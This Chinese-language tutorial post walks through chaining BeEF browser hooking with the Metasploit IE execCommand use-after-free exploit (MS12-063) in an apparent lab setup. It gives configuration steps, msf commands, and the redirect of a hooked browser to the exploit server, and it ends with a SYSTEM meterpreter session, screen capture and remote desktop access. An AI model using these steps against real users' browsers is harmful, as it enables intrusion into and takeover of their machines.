系統(tǒng):KALI

用到的工具：beEF+msf

利用的IE漏洞是：http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf

MS12-063
AutomaticIE 7 on Windows XP SP3IE 8 on Windows XP SP3IE 7 on Windows VistaIE 8 on Windows VistaIE 8 on Windows 7IE 9 on Windows 7
用到的beef+msf

先配置下：

root@kali:~# cd /usr/share/beef-xss/root@kali:/usr/share/beef-xss# lsbeef beef_key.pem config.yaml db Gemfile modulesbeef_cert.pem bundle core extensions Gemfile.lock
編輯下config.yaml
把metasploit ：false改成true



再進(jìn)入extensions/metasploit/
同樣修改下config.yaml
把host跟callback_host 改成自己的IP 這里是220.128



再改動(dòng)下custom path：



這樣beef已經(jīng)配置好了。那就運(yùn)行下metasploit



運(yùn)行msf后 數(shù)據(jù)庫連接下，不然上線也會(huì)沒有提示的。這里的pass 就是extensions/metasploit/config.yaml里面的pass



這樣就沒有什么問題。我們可以先看一下beef.數(shù)據(jù)庫只要連上了就不會(huì)出現(xiàn)msf的api錯(cuò)誤的。



進(jìn)入beef



賬號(hào)密碼beef 配置文件里面有。beef:beef



那beef已經(jīng)都OK了。
現(xiàn)在來搞下選擇下要顯示的頁面：



hook.js 運(yùn)行beef 顯示出來的。
別忘記運(yùn)行下apache。



我們再進(jìn)入msf

use exploit/windows/browser/ie_execcommand_uaf
可以自己根據(jù)自己的要求來選擇。

show options
port可以自已改。



我用xp+ie7



直接訪問下我們的頁面192.168.220.128/xss/
beef就會(huì)顯示出來了。



點(diǎn)擊 commands-hookeddomain-REDIRECT BROWSER 讓他重新跳轉(zhuǎn)到我們msf生成的地址上。beef很多功能。
把地址改成192.168.220.128:8080(msf生成的地址)



我們就會(huì)看到msf上面已經(jīng)顯示出來了。 回顯了sessions
payload可以自己去改。我使用的meterpreter載荷



執(zhí)行sessions -i



執(zhí)行sessions -i ID號(hào)
可以執(zhí)行任意命令已經(jīng)是系統(tǒng)權(quán)限



執(zhí)行下screenshost

meterpreter > screenshot Screenshot saved to: /root/dlsSQBkF.jpeg
就可以看到當(dāng)前主機(jī)的屏幕內(nèi)容。



也可以rdesktop 遠(yuǎn)程連接上去。
參數(shù)rdesktop -f ip -u username -p password
這也是一種xss掛馬拿內(nèi)網(wǎng)主機(jī)。

注：鄙人每天都在寫一些metasploit的玩法，如果有大神有什么好的方法希望告訴我，我更新在空間，分享給大家。